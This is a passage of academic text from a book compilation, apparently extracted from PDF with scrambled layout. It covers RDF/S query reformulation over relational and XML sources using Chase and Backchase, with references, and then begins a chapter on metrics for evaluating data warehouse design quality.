about the artifacts they painted. However, since the mapping rule’s body remains the same, the information captured by “Cubist(x)” is partial, since it considers only cubists that have painted (i.e., we don’t care for what they have actually painted). Given the previous mapping rules, we are able to establish a correspondence between any fragment of the source (a view over a relational database, a path or any XML subgraph) and any fragment of the RDF/S ontology (class, property, path, subgraph).
SWIM QUERY REFORMULATION The SWIM query reformulation algorithm (see Table 4) relies on Chase and Backchase (Deutsch et al., 1999). In particular, Chase is used in order to compose the initial query Q with the constraints capturing the RDF/S ontology semantics and in a following step with the constraints interpreting the mapping rules. Backchase, is used for finding a minimal query employing specific source predicates (e.g., the minimal query written in terms of the source views bodies). In order to compose a query Q with the mappings, Q should involve the direct instances of the RDF/S classes (or properties) for which we have at least one available mapping. If such a mapping exists, Chase and Backchase algorithms can rewrite this query Q in terms of the local sources, and the rewriting is exact (or equivalence preserving). However, since we consider expressive RQL patterns, involving both schema and data querying, the unfolding of the schema information (see SWLF constraints) yields a union of queries (each of them not involving schema navigation but only direct class or property instances). As we will see in the sequel, for this union of SWLF queries, SWIM query reformulation algorithm finally computes a maximally contained rewriting (Duschka & Levy, 1997).
Mediating RDF/S Queries to Relational and XML Sources
Table 4. Query reformulation algorithm • •
• 1.
2. 3.
Input: The user query. Given: A set of constraints capturing an RDF/S ontology and its semantics (see SWLF), A set of mappings between the RDF/S ontology and the local sources (see Table 3), A set of constraints defined over the local sources (see Step 3). Output: The maximally contained reformulated query. The SWLF query is chased in order to be composed with the constraints capturing the semantics of the RDF/S ontology. The result is a query or a union of queries expressed in terms of the view clauses (mappings’ head). Every resulted query (in case of union of queries) is chased with the set of mappings in order to be expressed in terms of the local sources. The query (coming from the queries that can be expressed in terms of the local sources) is backchased with the help of additional constraints (if any) coming from the local sources in order to be minimized.
Query Containment and Minimization Using Chase and Backchase The Chase algorithm (Deutsch et al., 1999) is employed to check containment or equivalence between two queries8. Chase comprises a sequential execution of a number of chase steps. For example, given a constraint ∀x, y A(x, y) → B(x) and the query Q(x) :- A(x, y), the chase step leads to query Q(x) :- A(x, y), B(x). When no more chase steps can apply, the Chase ends and the query outputted is called the universal plan. Intuitively, one query is contained in another, if the latter query is “included” in the universal plan of the former. However, the Chase algorithm with an arbitrary set of DEDs is not guaranteed to terminate. Thanks to the syntactic restriction introduced in Deutsch and Tannen (2003), namely stratified-witness, we can ensure termination of the Chase under a set of disjunction-free DEDs. When a set of disjunctionfree DEDs respects stratified-witness, no sequence
of chase steps can force the Chase to diverge, it ensures that the constraints cannot introduce an infinite number of fresh variables in the query. Stratified-witness can be extended in order to handle constraints that use disjunction. The key idea lies on splitting the disjunctive constraints into disjunction-free ones and checking whether one of the possible combinations of disjunctionfree constraints leads to an endless execution of chase steps by checking them for stratified-witness. It is worth noticing that the set of constraints capturing a particular RDF/S ontology does not satisfy per se stratified-witness. Fortunately, it does not allow the introduction of an infinite number of fresh variables (see Serfiotis (2005) for further details). Thus, for our set of DEDs the Chase algorithm is guaranteed to terminate. Based on the results of Deutsch (2002) and Serfiotis et al. (2005) chase-based containment algorithm for unions of conjunctive queries under a set of DEDs is sound. Theorem 1. Given two unions of conjunctive queries Q1, Q2 and a set D of DEDs, assume that
605
Mediating RDF/S Queries to Relational and XML Sources
the Chase of Q1 with D terminates rendering the universal plan U1. Then, Q1 is contained in Q2 under D (Q1 ⊆D Q2), iff for every i there is a j such that U1i is contained in Q2j, i.e., there is a containment mapping from Q2j into U1i
Query Reformulation
Moreover, it is obvious that two queries Q1, Q2 are equivalent under a set D of constraints (Q1 ≡D Q2) iff Q1 ⊆D Q2 and Q2 ⊆D Q1. Query minimization is based on the Backchase algorithm, which given a query’s universal plan checks all its subqueries for minimality and equivalence to the original query. According to the following theorem introduced in Deutsch et al. (2003) the Backchase is guaranteed to find all minimal equivalent subqueries (when the Chase terminates), termed D-minimal query reformulations and, in this way, it ensures the completeness of the minimization algorithm.
Step 1-2: Core Reformulation Algorithm
Theorem 2. Given a union of conjunctive queries Q and a set D of DEDs, if the Chase of Q with D terminates yielding the universal plan U, all D-minimal reformulations of Q are subqueries of U
By chasing the query with the basic constraint (2) (for properties) we get the query:
As far as the complexities of the Chase/Backchase algorithms are concerned, we should notice the following: Chase applied to a conjunctive query given a set of disjunction-free constraints satisfying stratified-witness, is a decidable problem in the complexity class of NP. Backchase searches between candidate subqueries from the universal plan. This leads to an NP-complete problem in the number of chase sequences (i.e., an exponential number of NP-complete problems). However, approximation algorithms could be used in practice to return a minimized query instead of the minimum (Deutsch, 2002). For a thorough complexity analysis of the algorithms and the stratified-witness property satisfaction for the employed DEDs, readers are referred to Serfiotis (2005).
606
In this section, we will run step by step through our cultural example the SWIM query reformulation algorithm (see Table 4).
Example 3. The first step of the algorithm enforces the chasing of the query with the constraints capturing the semantics of the particular RDF/S ontology. Let’s assume the RQL query presented in Table 1 and translated into SWLF predicates given in Example 1. ans(x):- P_SUB(q1, p1), P_EXT(x, q1, y), P_SUB(q2, p2), P_EXT(y, q2, z), z = “Louvre,” p1 = “Exhibited,” p2 = “Denom”
The next chase step involves the first domain/ range constraint9: ans(x):- P_SUB(q1, p1), P_EXT(x, q1, y), P_SUB(q2, p2), P_EXT(y, q2, z), PROP(c1, q1, d1), PROP(a1, p1, b1), PROP(c2, q2, d2), PROP(a2, p2, b2), C_SUB(c1, a1), C_SUB(d1, b1), C_SUB(c2, a2), C_SUB(d2, b2), z = “Louvre”, p1 = “Exhibited”, p2 = “Denom”
After a number of chase steps, we conclude to the universal plan10: U1 ans(x):- P_EXT(x,q1,y),P_EXT(y,q 2 ,z),C_EXT(c1,x),C_ EXT(d1,y),C_EXT(c2,y),C_EXT(d2,z),z= “Louvre”,q1=
Mediating RDF/S Queries to Relational and XML Sources
As can be seen in the universal plan U1, the union of three queries follows from the fact that class Artifact has three subclasses (Artifact itself, Painting, and Sculpture). The difference in the value of c1 (c1= “Artifact,” c1= “Painting,” c1= “Sculpture”) is the only difference between the three queries and indicates the class whose x is a direct instance. The universal plan U1 is the query that will be composed with the mappings in order to be translated into terms of the source views. This is the second step of the reformulation algorithm, whose result is the following union of queries: U2 ans(x):- Artifact(x, c1, k1, y), Museum(z, a1, o1), y=z, Artifact(x, c2, k2, m2), Museum(y, a2, o2), Museum(y, a3, o3), z= “Louvre”
ans(x):- Artifact(x, c1, k1, y), Museum(z, a1, o1), y=z, Artifact(x, c2, k 2, m2), k 2= “Sculpture,” Museum(y, a 2, o2), Museum(y, a3, o3), z= “Louvre”
with the appropriate relational to RDF/S mappings presented in Table 3. In case of XML to RDF/S mappings (as also presented in Table 3) the universal plan is: U2′ ans(x):- {//Museum}(m1), {./@Name}(m1,y), {.//Artifact/ Title}(m1,x), {//Museum}(m2), {./@Name}(m2,z), y=z, {//Artifact/Title}(x), {//Museum/@Name}(y), {//Museum/@Name}(y), z= “Louvre”
Recall that the Chase and Backchase algorithms return exact rewritings of queries and thus, in our running example, we should find either an exact rewriting or no rewriting at all. In order to find a maximally contained rewriting we rewrite separately (with the help of Chase and Backchase) each query from the union (in which we concluded after chasing with the constraints capturing the semantics of an RDF/S ontology). Any query having an exact rewriting is added to the union of the queries that will be further processed in steps 3 and 4. Queries for which no mappings are available are discarded. For example, in case of the universal plan U1, if we assume that there is no mapping for the class Sculpture, the universal plans U2 and U2’ will include only the first two queries.
The universal plan U2 follows from the replacement11 of the view clauses (P_EXT, C_EXT)
607
Mediating RDF/S Queries to Relational and XML Sources
Step 3: Improving Reformulation with Sources’ Semantics
∀ t,c,k,m,c1,k1,m1 Artifact(t, c, k, m), Artifact(t, c1, k1, m1) → c = c1, k = k1, m= m1
Until now, the mediator query has been reformulated with the use of the constraints capturing only the semantics of the RDF/S ontology, and the mappings between the local sources and the RDF/S ontology. However, nothing guarantees that the computed maximally contained rewriting is free of duplicates regarding the returned sources instances. In order to improve the quality of the reformulated queries (and thus, reduce costly data transmissions), we also need to capture the semantics of source data. Relational databases, for example, include integrity constraints (keys, foreign keys, etc.), while XML Schemas may specify keys, keyrefs, etc. We can express in SWLF such integrity constraints (i.e., arbitrary key and foreign key constraints) as DEDs and thus, eliminate redundancies from maximally contained queries (i.e., simplify queries and eliminate redundant ones). The general form of DEDs employed to this end is:
Additionally, attribute Museum of relation Artifact is a foreign key referencing attribute Name of relation Museum: ∀t,c,k,m ∃m1,a1,c1 Artifact(t, c, k, m), Museum(m1, a1, c1) → m= m1
•
∀x {//Museum}(x) → ∃y {./@Name}(x, y) (every
museum has a name) ∀x,y,z {//Museum}(x), {./@Name}(x, y), {./@ Name}(x, z) → y=z (for every Museum hav-
ing two “name’s these “name’s are equal) ∀x,w,y {//Museum}(x), {./@Name}(x, y), {// Museum}(w), {./@Name}(w, y) → x=w (for
every two Museums having the same “name” these Museums are the same)
∀x ∃ψ [φ XML or Rel ( x ,ψ ) → φ XML or Rel ( x )] where φRel is a conjunctive query over a relational database source, and φ XML is a conjunctive path query over an XML source. The advantages of this functionality are explained through the following example: Example 4. Let’s assume the universal plans U2 and U2’ presented in Example 3. Additionally, we have the following information for the local sources:
In the XML document art.xml attribute, Name and element Title are considered to be keys for the elements Museum and Artifact respectively. For example, the former is expressed by the following three constraints:
By considering the previous two integrity constraints, the appliance of the step 3 of the reformulation algorithm will conclude to the following queries: U3 ans(x):- Artifact(x, c1, k1, y), y= “Louvre”
In the relational database art.db the attribute Title is a key for the relation Artifact, while attribute Name is a key for the relation Museum. For example, the former is expressed by the following constraint:
and U3′
Mediating RDF/S Queries to Relational and XML Sources
We can easily observe that the first query of U3 (as well as U3’) contains the other two (the other two are restrictions of the first one). Since there is a union operator between them, step 3 (Backchase) will return only this query. Finally, the reformulated query is translated back to the syntax of the local sources, namely XQuery/XPath and SQL (for details readers are referred to Koffina [2006]). To conclude, the first step of the algorithm uses Chase and Backchase in order to find the universal plan whose predicates are the view clauses (C_EXT, P_EXT). This step is sound and complete. The second step rewrites the query in terms of the local sources. Since this rewriting also relies on Chase and Backchase, we guarantee that in this step we get queries that are not only correct (are rewritten in terms of the local sources) but also complete (Backchase ensures that all possible queries are subqueries of the universal plan). The same is true for the third step of the algorithm. Hence, the SWIM query reformulation algorithm is sound and complete.
RELATED WORK AND CONCLUSION In the literature, we can distinguish between data exchange and data integration systems (see Table 1). The former (also known as data translation) migrate and restructure data from a source schema
according to a target schema (e.g., a mediator ontology) while the latter provide mechanisms for uniformly querying different sources through a target schema and, thus, avoid materializing it in advance. In both cases, mappings are established for translating data from source schemas to target schema and they usually adopt one of the following three approaches. The first, global-as-view (GAV), describes the target schema in terms of the local schemas. This approach facilitates query reformulation, but it is at disadvantage in source evolution/addition/deletion. Unlike GAV, in local-as-view (LAV) approach every source schema is described in terms of the target one. This enhances the addition/deletion of local sources but renders query reformulation more intricate. Based on these approaches, there is a hybrid called global-localas-view (GLAV) that provides easy source evolution/addition/ deletion, while query reformulation algorithm is no harder than in LAV. GLAV offers more expressive mappings allowing to specify which fragment (i.e., a view) of the target schema matches a fragment of the source ones. Based on this classification, we position the data publishing and query reformulation services of SWIM with respect to related projects. GAV mappings are employed in PEPSINT (Cruz et al., 2004; Xiao et al., 2004), WEESA (Klein, 2002; Reif et al., 2004) and FDR2 (Korotkiy et al., 2004) to integrate or publish relational and XML data sources using RDF/S ontologies. The employed mapping rules allow populating RDF/S classes (or concepts) with data from the relations or the xml elements of the local sources. Besides the richer form of mapping (GLAV) supported by our framework, SWIM also avoids a preliminary translation of source data and schema into local ontologies, which are then mapped to a mediator ontology. The latter limitation is tackled by a number of recently developed exchange tools also following the GAV approach like Virtuoso12, SquirrelRDF13, RDF14, Gateway DRQ15, D2RMap (Bizer, 2003), the Elena project wrapper (Miklos
609
Mediating RDF/S Queries to Relational and XML Sources
et al., 2005), and information integrator (Angele & Gesmann, 2006). Furthermore, compared to Lehti et al. (2004) employing OWL both for the representation of the mediator ontology and for the specification of the mappings, SWIM supports arbitrary disjunctive queries in mappings (rather than equivalence/intersection/union of OWL classes and properties) while users are exposed only to the mediator ontology (and not its merge with the local ones). A worth noticing mapping system for OWL-DL ontologies has been presented in Haase and Motik, 2005), where mappings are expressed as correspondences between conjunctive queries over ontologies (GLAV approach). Given that query answering within such setting is undecidable (see also Goasdoue & Rousset (2004)
for detailed complexity results on query answering using description logics-based frameworks), authors introduce suitable restrictions to express mappings in OWL-DL extended with the so-called DL-safe subset of the semantic Web rule language (SWRL). Obviously, the proposed system is not designed to support mapping to Rel and XML sources. We also plan to investigate in the future how SWRL can be exploited to express SWIM queries/views and mapping rules. LAV mapping are employed in Benatallah et al. (2005) and Styx (Amann et al., 2002; Fundulaki, 2002) to integrate e-Catalogs and XML sources using a subset of OWL-Lite or ER schemas. In Benatallah et al. (2005), mappings specify lexical relationships between concepts (synonymy,
Table 5. Expressiveness of mappings and related systems
GAV
Data integration systems
GAV and limited LAV LAV
GLAV
GAV data exchange systems GLAV
610
Materialized PEPSINT (Cruz et al., 2004; Xiao et al., 2004)
Virtual (Lehti et al., 2004) Piazza (Halevy et al., 2003; Tatarinov et al., 2003; Tatarinov et al., 2004) Styx (Amann et al., 2002) (Goasdoue et al., 2004) (Benatallah et al., 2005) DartGrid (Chen et al., 2006b) (Yu & Popa, 2004) (Haase et al., 2005)
(Klein, 2002) Virtuoso, SquirrelRDF, RDF Gateway WEESA (Reif et al., DRQ, D2RMap (Bizer, 2003) 2004) Elena Wrapper (Miklos et al., 2005) FDR2 (Korotkiy et al., Information Integrator (Angele et al., 2006) 2004) Clio (Miller, Hernandez, Haas, Yan, Ho, Fagin & Popa, 2001; Miller et al., 2000; Velegrakis, 2005) MAPONTO (An et al., 2005)
Mediating RDF/S Queries to Relational and XML Sources
hypernymy, etc.) while the maximally contained query (which is actually a class description) is computed in polynomial time using hypergraph techniques. The low complexity bounds of the query reformulation algorithm are achieved by reducing the expressiveness of the language employed to specify mapping and queries. Styx (Amann et al., 2002; Fundulaki, 2002) (like SWIM) uses XPath expressions in order to establish the mappings between the sources and the mediator ontology. However, Styx proves soundness and completeness only for mapping rules employing a limited fragment of XPath expressions (i.e., attribute and child axes), and does not take into account constraints defined on the XML sources. The recently proposed DartGrid integration system also employs LAV mapping (Chen et al., 2006a, 2006b) to define each relational table as a view over the mediator ontologies. The proposed reformulation algorithm is bound (as in SWIM) by the well-known complexity of the query rewriting problem using views (NP-Complete) while the paper does not address query containment and minimization issues (in the presence of constraints both at the mediator ontology and source schemas). Unlike Piazza (Halevy, Ives, Mork & Tatarinov, 2003; Tatarinov & Halevy, 2004), employing GAV and a limited form of LAV mappings, SWIM is able to capture the semantics of the RDF/S data model (e.g., subsumption relationships between classes (or properties) and not simply its XML syntax), while exploits constraints defined both over the ontologies and the source schemas. Finally, Clio (Miller, Haas, & Hernandez, 2000; Velegrakis, 2005) provides users with an effective mechanism for semi-automatically generating GLAV mappings between target and source ontologies, it relieves them from the arduous and time-consuming task of generating and managing mappings in case of source evolution. Although an automatic inference of mappings from simple predicate correspondences between relational schemas and mediator ontologies is difficult, it
would be a great enhancement to SWIM if some candidate mapping suggestions could be provided beforehand (as recently proposed for LAV mappings in An, Borgida, & Mylopoulos, (2005)). However, the constraints actually considered by Clio (defined over the source and the target schemas) are embedded dependencies instead of DEDs considered by SWIM, which are necessary for capturing the (subsumption) semantics of an RDF/S ontology.
REFERENCES Abiteboul, S., Hull, R., & Vianu, V. (1995). Foundations of databases. Addison Wesley. Amann, B., Beeri, C., Fundulaki, I., & Scholl, M. (2002). Querying XML sources using an ontology-based mediator. In Proceedings of the 10th International Conference on Cooperative Information Systems (CoopIS), Irvine, California. An, Y., Borgida, A., & Mylopoulos, J. (2005). Building semantic mappings from databases to ontologies. In Proceedings of the 21st National Conference on Artificial Intelligence (AAAI), Boston, MA. Angele, J., & Gesmann, M. (2006). Data integration using semantic technology: A use case. In Proceedings of the 3rd Annual European Semantic Web Conference (ESWC), Budva, Montenegro Benatallah, B., Hacid, M., Paik, H., Rey, C., & Toumani, F. (2005). Towards semantic-driven, flexible, and scalable framework for peering and querying e-catalog communities. Information Systems International Journal, special issue on Semantic Web. Bizer, C. (2003). D2R Map--A database to RDF mapping language. Poster at WWW. Budapest, Hungary. Chen, H., Wang, Y., Wang, H., Mao, Y., Tang, J., Zhou, C., Yin, A., Cui, M., & Wu, Z. (2006).
611
Mediating RDF/S Queries to Relational and XML Sources
From legacy relational databases to the semantic Web: An in-use application for traditional Chinese medicine. In Proceedings of the 5th International Semantic Web Conference (ISWC) in Use Track, Athens, GA, USA. Chen, H., Wu, Z., Wang H., & Mao, Y. (2006). RDF/RDFS-based relational database integration. In Proceedings of the 22nd International Conference on Data Engineering (ICDE) Industrial Session, Athens, GA, USA. Cluet, S., Delobel, C., Simeon, J., & Smaga, K. (1998). Your mediators need data conversions! In Proceedings of the ACM SIGMOD (pp. 177-188). Seattle, USA.
Goasdoue, F., & Rousset, M. C. (2004). Answering queries using views: A KRDB perspective for the semantic Web. ACM Transaction on Internet Technology, 4(3), 255-288. Haase, P., & Motik, B. (2005). A mapping system for the integration of OWL-DL ontologies. In Proceedings of 1st International Workshop on Interoperability of Heterogeneous Information Systems (pp. 9-16), Bremen, Germany. Haase, P., Broekstra, J., Eberhart, A., & Volz, R. (2004). A comparison of RDF query languages. In Proceedings of the 3rd International Semantic Web Conference (ISWC) (pp. 502-517). Japan.
Cruz, I. F., Xiao, H., & Hsu, F. (2004). Peer-topeer semantic integration of XML and RDF data sources. The 3rd AP2PC Workshop. New York City, USA.
Halevy, A., Ives, Z., Mork, P., & Tatarinov, I. (2003). Piazza: Data management infrastructure for semantic Web applications. In Proceedings of the 12th International World Wide Web (WWW) Conference. Budapest, Hungary.
Deutsch, A. (2002). XML query reformulation over mixed and redundant storage. PhD thesis, University of Pennsylvania.
Harmelen, F., & McGuiness, D. (2004). OWL Web ontology language overview. W3C Recommendation.
Deutsch A., & Tannen, V. (2003). Reformulation of XML queries and constraints. In Proceedings of ICDT (pp. 225-241). Italy.
Hayes, P. (2004). RDF semantics. W3C Recommendation.
Deutsch, A., Popa, L., & Tannen, V. (1999). Physical data independence, constraints and optimization with universal plans. In Proceedings of VLDB (pp. 459-470). Edinburgh.
Karvounarakis, G., Alexaki, S., Christophides, V., Plexousakis, D., & Scholl, M. (2002). RQL: A declarative query language for RDF. In Proceedings of the 11th International World Wide Web (WWW) Conference (pp. 592-603). Honolulu, Hawaii.
Duschka, O., & Levy, A. (1997). Recursive plans for information gathering. Proceedings of IJCAI (pp. 778-784). Nagoya, Japan.
Klein, M. (2002). Interpreting XML via an RDF schema. In Proceedings of DEXA. Aix-en-Provence, France.
Friedman, M., Levy, A., & Millstein, T. (1999). Navigational plans for data integration. In Proceedings of the 16th National Conference on Artificial Intelligence (AAAI) (pp. 67-73), Orlando, Florida, USA.
Koffina, I. (2005). Integrating XML data sources using RDF/S schemas. Master’s thesis, University of Crete.
Fundulaki, I. (2002). Integration et Interrogations de Resources XML pour Communautes Web. PhD thesis CNAM Paris.
612
Korotkiy, M., & Top, J. (2004). From relational data to RDF/S model. In Proceedings of the International Conference on Web Engineering. Munich, Germany.
Mediating RDF/S Queries to Relational and XML Sources
Lee, J., & Goodwin, R. (2005). The semantic Webscape: A view of the semantic Web. In Proceedings of the 14th International World Wide Web (WWW) Conference (pp. 1154-1155). Chiba, Japan. Lehti, P., & Fankhauser, P. (2004). XML data integration with OWL: Experiences and challenges. In Proceedings of the 3rd International Symposium on Applications and the Internet (SAINT) (pp. 160-170). Tokyo, Japan.
Reif, G., Jazayeri, M., & Gall, H. (2004). Towards semantic Web eEngineering: WEESA—mapping XML schema to ontologies. In Proceedings of WWW2004 Workshop on Application Design, Development, and Implementation Issues in the Semantic Web. New York, USA. Serfiotis, G. (2005). Optimizing and reformulating RQL queries on the semantic Web. Master’s thesis, University of Crete.
Levy, A., Rajaraman, A., & Ordille, J. (1996). Querying heterogeneous information sources using source descriptions. In Proceedings of the 22nd International Conference on Very Large Databases (VLDB) (pp. 251-262). Bombay, India.
Serfiotis, G., Koffina, I., Christophides, V., & Tannen, V. (2005). Containment and minimization of RDF/S query patterns. In Proceedings of the 4th International Semantic Web Conference (ISWC), Galway, Ireland.
Magkanaraki, A., Tannen, V., Christophides, V., & Plexousakis, D. (2003). Viewing the semantic Web through RVL lenses. In Proceedings of the 2nd International Semantic Web Conference (ISWC) (pp. 96-112). Sanibel Island, Florida, USA.
Tatarinov, I., & Halevy, A. (2004). Efficient query reformulation in peer data management systems. In Proceedings of the ACM SIGMOD (pp. 539550). Paris, France.
Manola, F., & Miller, E. (2004). RDF primer. W3C Recommendation. Miklos, Z., & Sobernig, S. (2005). Query translation between RDF and XML: A case study in the educational domain. In Proceedings of the Workshop on Interoperability of Web-Based Educational Systems. Chiba, Japan.
Tatarinov, I., Ives, Z., Madhavan, Y., Halevy, A., Suciu, D., Dalvi, N., (Luna) Dong, X., Kadiyska, Y., Miklau, G., & Mork, P. (2003). The Piazza peer data management project. SIGMOD Record, 32(3), 47-52. Velegrakis, Y. (2005). Managing schema mappings in highly heterogeneous environments. PhD thesis, University of Toronto.
Miller, R. J., Haas, L., & Hernandez, M. (2000). Clio: Schema mapping as query discovery. In Proceedings of VLDB (pp. 77-88). Cairo, Egypt.
Xiao, H., & Cruz, I. (2004). RDF-based metadata management in peer-to-peer systems. Proceedings of the 2nd IST MMGPS Workshop. London.
Miller, R. J., Hernandez, M., Haas, L., Yan, L., Howard Ho, C. T., Fagin, R., & Popa, L. (2001). The Clio project: Managing heterogeneity. SIGMOD Record, 30(1), 78-83.
Yu, C., & Popa, L. (2004). Constraint-based XML query rewritting for data integration. In Proceedings of the ACM SIGMOD (pp. 371-382). Paris, France.
Papakonstantinou, Y., Garcia-Molina, H., & Widom, J. (1995). Object exchange across heterogeneous information sources. In Proceedings of the 11th IEEE International Conference on Data Engineering (ICDE) (pp.251-260). Taipei, Taiwan.
ENDNOTES 1
The underlined attributes denote keys, while those in italics denote foreign keys.
613
Mediating RDF/S Queries to Relational and XML Sources
2
3
4
5
6 7 8
Constraints for properties can be defined in a similar way. Expressed in a simplified form of DEDs with only existentially quantified variables ( j ' ( y ) where φ’ is an SWLF predicate and y is a tuple of constants). Expressed in a simplified form of DEDs with only universally quantified variables l (∀ x ⎡⎢ ( x ) → i∨=1 i' ( x ) ⎤⎥). ⎣ ⎦ It is worth noticing that in our framework the literal datatypes (String, Integer, DateTime, etc.) are considered as classes. www.w3.org/TR/rdf-sparql-query/ http://www.w3.org/TR/xpath20/. For a detailed analysis of containment, equivalence, and minimization issues in the context of RDF/S query patterns readers are referred to Serfiotis et al. (2005).
9
10
11
12
13 14 15
The predicates triggering the chase step are given in bold while the introduced ones are underlined. To improve paper readability we have eliminated predicates that will not further trigger a constraint. As a matter of a fact we do not replace the view clauses with the mappings (as presented here for simplicity) but we add the mappings. http://virtuoso.openlinksw.com/wiki/main/ Main/VOSSQLRDF http://jena.sourceforge.net/SquirrelRDF/ http://www.intellidimension.com http://www.wiwiss.fu-berlin.de/suhl/bizer/ D2RQ/
This work was previously published in the International Journal on Semantic Web & Information Systems, edited by A. Sheth and M. Lytras, Volume 2, Issue 4, pp. 68-91, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
614
615
Chapter 2.11
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses Maurizio Pighin University of Udine, Italy Lucio Ieronutti University of Udine, Italy
ABSTRACT The design and configuration of a data warehouse can be difficult tasks especially in the case of very large databases and in the presence of redundant information. In particular, the choice of which attributes have to be considered as dimensions and measures can be not trivial and it can heavily influence the effectiveness of the final system. In this article, we propose a methodology targeted at supporting the design and deriving information on the total quality of the final data warehouse. We tested our proposal on three real-word commercial ERP databases.
INTRODUCTION AND MOTIVATION Information systems allow companies and organizations to collect a large number of transactional data. Starting from this data, datawarehousing provides architectures and tools to derive information at a level of abstraction suitable for supporting decision processes. There are different factors influencing the effectiveness of a data warehouse and the quality of related decisions. For example, while the selection of good-quality operational data enable to better target the decision process in the presence of alternative choices (Chengalur-Smith, Ballou, & Pazer, 1999), poor-quality data cause information scrap and rework that wastes people, money, materials and facilities resources (Ballau,
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Wang, Pazer, & Tayi, 1998; English, 1999; Wang & Strong, 1996a, 1996b). We have recently started at facing the problem of data quality in data warehouses (Pighin & Ieronutti, 2007); at the beginning of our research, we have considered the semantics-based solutions that have been proposed in the literature, and then we moved towards statistical methods, since in a real-world scenario data warehouse-engineers typically have a partial knowledge and vision of a specific operational database (e.g., how an organization really uses the operational system) and related semantics and then they need a support for the selection of data required to build a data warehouse. We then propose a contextindependent methodology that is able both to support the expert during the data warehouse creation and evaluate the final quality of taken design choices. The proposed solution is mainly focused on statistical and syntactical aspects of data rather on semantics and it is based on a set of metrics, each one designed with the aim of capturing a particular data feature. However, since most design choices are based on semantic considerations, our goal is to propose a solution that can be coupled with semantics-based techniques (for instance the one proposed by Golfarelli, Maio, and Rizzi (1998)) to effectively drive design choices. In particular, our methodology results effective in the following situations:
•
At the end of the data warehouse design, it measures in quantitative terms the final quality of the data warehouse. Moreover, in the case of data warehouses based on the same design choices (characterized by the same schema), our methodology is also able to evaluate how data really stored into the initial database influences the informative content of the resulting data warehouse.
To evaluate the effectiveness of our methodology in identifying attributes that are more suitable to be used as dimensions and measures, we have experimented proposed metrics on three real ERP (Enterprise Resource Planning) commercial systems. Two systems are based on a DB Informix running on Unix server and one is based on a DB Oracle running on Windows server. In the experiment, they are called respectively DB01, DB02 and DB03. More specifically, our metrics have been tested on data collected by the selling subsystems. In this article, we refer to measures and dimensions related to the data warehouse, and to metrics as the indexes defined in the methodology we propose for evaluating data quality and reliability. Moreover, we use DW and DB to identify respectively a decisional data warehouse and an operational database.
RELATED WORK •
616
During the construction phase, it is able to drive the selection of an attribute in the case of multiple choices (i.e., redundant information); for example, when an attribute belongs to different tables of a given database or belongs to different databases (that is the typical scenario in these kind of applications). Additionally, it is able to evaluate the quality of each choice (i.e., the informative value added to the final data warehouse choosing a table and its attribute as measure or dimension).
In the literature, different researchers have been focused on data quality in operational systems and a number of different definitions and methodologies have been proposed, each one characterized by different quality metrics. Although Wang (1996a) and Redman (1996) proposed a wide number of metrics that have become the reference models for data quality in operational systems, in the literature most works refer only to a limited subset (e.g., accuracy, completeness, consistency and timeliness).
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
Literature reviews (e.g., Wang, Storey, & Firth, 1995) highlighted that there is not a general agreement on data quality metrics; for example, timeliness has been defined by some researchers in terms of whether the data are out of date (Ballou & Pazer, 1985), while other researchers use the same term for identifying the availability of output on time (Karr, Sanil, & Banks, 2006; Kriebel, 1978; Scannapieco, Virgillito, Marchetti, Mecella, & Baldoni, 2004). Moreover, some of the proposed metrics, called subjective metrics (Wang & Strong, 1996a); require an evaluation made by questionnaires and/or interviews and then result more suitable for qualitative evaluations rather than quantitative ones. Jeusfeld, Quix, and Jarke (1998) adopt a metamodeling approach for linking quality measurements to different abstraction levels and user requirements, and propose a notation to formulate quality goals, queries and measurements. Some researchers have been focused on automatic methods for conceptual schema development and evaluation. Some of these approaches (e.g., Phipps & Davis, 2002) include the possibility of using the user input to refine the obtained result. However, these solutions typically require to translate user requirements into a formal and complete description of a logical schema. An alternative category of approaches employs statistical techniques for assessing data quality. For example, analyzing the statistical distributions of data it can provide useful information on data quality. In this context, an interesting work has been presented in (Karr et al., 2006), where a statistical approach has been experimented on two real databases; their work provided us with interesting cues and gave a strong motivation for our research. A different category of techniques for assessing data quality concerns Cooperative Information Systems (CISs). In this context, the DaQuinCIS project proposed a methodology (Scannapieco et al., 2004) for quality measurement and improvement. The proposed solution is primarily based
on the premise that CISs are characterized by high data replication (i.e., different copies of the same data are stored by different organizations). From data quality prospective, this feature offers the opportunity of evaluating and improving data quality on the basis of comparisons among different copies. Data redundancy has been effectively used not only for identifying mistakes, but also for reconciling available copies or selecting the most appropriate ones. With respect to operational systems, additional factors influence the effectiveness of data warehouses and the quality of related decisions. For example, while in the context of operational systems the quality of data mainly depends on the design and production processes generating and integrating data, in data warehouses the choice of which attributes have to be considered as measures and which as dimensions heavily influence the data warehouse effectiveness.
PROPOSED INDEXES In this Section, we describe the set of indexes we propose for evaluating how much an attribute of a given DB is suitable to be used for correctly building a DW. Considering the whole set of definitions and metrics that have been proposed in the literature for assessing data quality of an operational DB, we identified the concepts relevance and valueadded proposed by Wang (1996a) as the most appropriate ones for our analysis. Indeed, we are interested in identifying the set of attributes of a given DB storing relevant information and that could add value in decision processes. For such purpose, we identified a set of indexes referring to the following two types of DB entities: •
Tables of a DB: At a general level, we define a set of metrics highlighting which tables of a given DB could contain more/less relevant data.
617
A Methodology Supporting the Design and Evaluating the Final Quality of Data Warehouses
•
Attributes of a table: At a level of a single table, we define a set of metrics that help users in identifying which attributes of a given table would be more relevant for data analysis purposes.
In the following, we first introduce two elementary functions, and then we describe the metrics we propose for DB tables and corresponding coefficients: •
All proposed indexes are normalized into the interval [0, 1], where 0 indicates that the set of data belonging to the considered entity (attribute or table) does not provide value added from the data analysis point of view, while 1 indicates that it can play a fundamental role in supporting decision processes. In the following Sections, we separately present indexes referring to the above types of entities.
Indexes for Tables In this section, we describe the set of metrics Me=1..k and corresponding indexes we propose for DB tables. With these metrics, we aim at taking into account that different tables could play different roles and then result more/less suitable for extracting measures and dimensions. The global indicators Sm,j and Sd,j measuring how much the table tj is suitable to extract measures and dimensions are derived by combining the indexes computed by the metrics Me=1..k using respectively the coefficients Cm,e and Cd,e. These global indicators are used: (i) to support the selection of the tables for the DW construction, (ii) to differently weight the indexes computed on the attributes belonging to different tables. In particular, the two indexes Sm,j and Sd,j are derived as described in Formula 1.
∑ (C k
S p, j =
e =1
p ,e
* M e (t j ) )
(1)
k
